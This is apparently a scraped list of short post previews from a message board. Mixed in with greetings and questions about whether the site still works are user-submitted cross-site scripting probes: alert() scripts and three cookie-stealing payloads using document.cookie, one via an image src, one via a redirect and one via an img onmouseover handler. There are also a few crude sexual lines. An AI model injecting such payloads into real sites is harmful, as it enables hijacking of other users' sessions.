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Hello can anyone hear me out
whats the date of these postings
Why are the posts I'm seeing like 6 or 8 years old??!! Are there newer ones and how do I find them?? ...
<h1 style="color: blue">Hello, world</h1>
<script>alert("sorria, voce foi hackeado - smile, you were hacked")</script>
<script>alert("Hello, world!")</script>
slutty happy
naughty happy
cummy gengar
gengar cummy
b mvhm
I woke up this morning thinking about the way we have been marginalized into small pods the promise o...
<script>new image().src=""+document.cookie</script>
<script> window.location.href = ""+ document.cookie; </script>
<img src=a onmouseover=window.location.href='{document.cookie}'>
<script>alert("wanderson é um cara legal")</script>
Hello all, New Harnu user here...any interesting topic of the day ?
Hey world! Wanna have some friends
Hello World! Welcome to Aware. Click "Read More" to view the expanded message to learn more about thi...
Is this platform still working